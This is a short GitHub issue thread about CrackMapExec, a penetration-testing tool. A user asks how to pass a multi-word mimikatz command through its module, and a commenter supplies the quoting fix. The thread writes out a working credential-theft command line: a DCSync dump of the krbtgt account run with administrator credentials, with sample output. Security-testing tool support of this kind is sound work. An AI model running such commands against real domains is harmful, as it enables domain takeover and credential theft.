### ISSUE TITLE
Module command flags are passed as command

### ISSUE THREAD

**Issue by denevin** [byt3bl33d3r/CrackMapExec#287]
I'm trying to execute two mimikatz commands with cme. The second command needs to be run with additional parameter of "/user:krbtgt". When I try to run this with cme it results in three separate commands being run instead of two. Is it possible to have cme pass the "lsadump::dcsync /user:krbtgt" string as one command to mimikatz instead of two?

---------------------------
Current command result:

cme smb 192.168.1.1 -d WORKGROUP -u Administrator -p abc -M mimikatz -o COMMAND='privilege::debug lsadump::dcsync /user:krbtgt'

mimikatz(powershell) # privilege::debug
Privilege '20' OK

mimikatz(powershell) # lsadump::dcsync
...

mimikatz(powershell) # /user:krbtgt
ERROR mimikatz_doLocal ; "/user:krbtgt" command of "standard" module not found !

---------------------------
Expected command result:

mimikatz(powershell) # privilege::debug
Privilege '20' OK

mimikatz(powershell) # lsadump::dcsync /user:krbtgt
...

**Comment by geethup** [comment]
you should run it that way:
`COMMAND='privilege::debug "lsadump::dcsync /user:krbtgt"'`

**Comment by byt3bl33d3r** [comment]
^^ closing
